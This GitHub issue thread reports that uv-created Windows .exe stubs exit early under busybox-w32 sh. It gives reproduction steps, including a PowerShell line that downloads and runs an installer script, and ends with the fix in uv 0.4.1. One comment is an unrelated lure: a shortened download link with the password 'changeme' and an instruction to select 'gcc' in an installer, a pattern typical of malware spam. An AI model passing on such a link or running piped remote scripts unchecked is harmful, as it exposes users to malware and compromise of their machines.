### ISSUE TITLE
astral-sh uv makes .exe stubs that exit abnormally early when run within busybox sh

### ISSUE THREAD

**Issue by doctorpangloss** [rmyorston/busybox-w32#451]
When using https://github.com/astral-sh/uv, the library that they use (and probably others in the Rust ecosystem) to create executable stubs on Windows interacts poorly with busybox such that the stubs exit abnormally early.

![WindowsTerminal_qBCDluBxeQ](https://github.com/user-attachments/assets/f49814a2-556d-43b6-8fed-a96f7a1a3736)

Reproduction (requires python)

prereqs:
```
choco install -y python
powershell -c "irm https://astral.sh/uv/install.ps1 | iex"
```

repro:
```
mkdir uv-test
cd uv-test
uv venv --seed
source .venv/scripts/activate
pip install insightface
```

observe regardless of the packages you try to install (I chose one that is guaranteed to run for a long time), the .exe stubs that uv and only uv creates seem to exit abnormally early only in `sh`. Stubs exit normally in powershell and batch.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by rmyorston** [comment]
This appears to be fixed in the 0.4.1 release of uv.

**Comment by doctorpangloss** [comment]
yes this appears to be addressed, just with some other subtle stderr noise but otherwise looks good. Thanks for working with them to investigate this
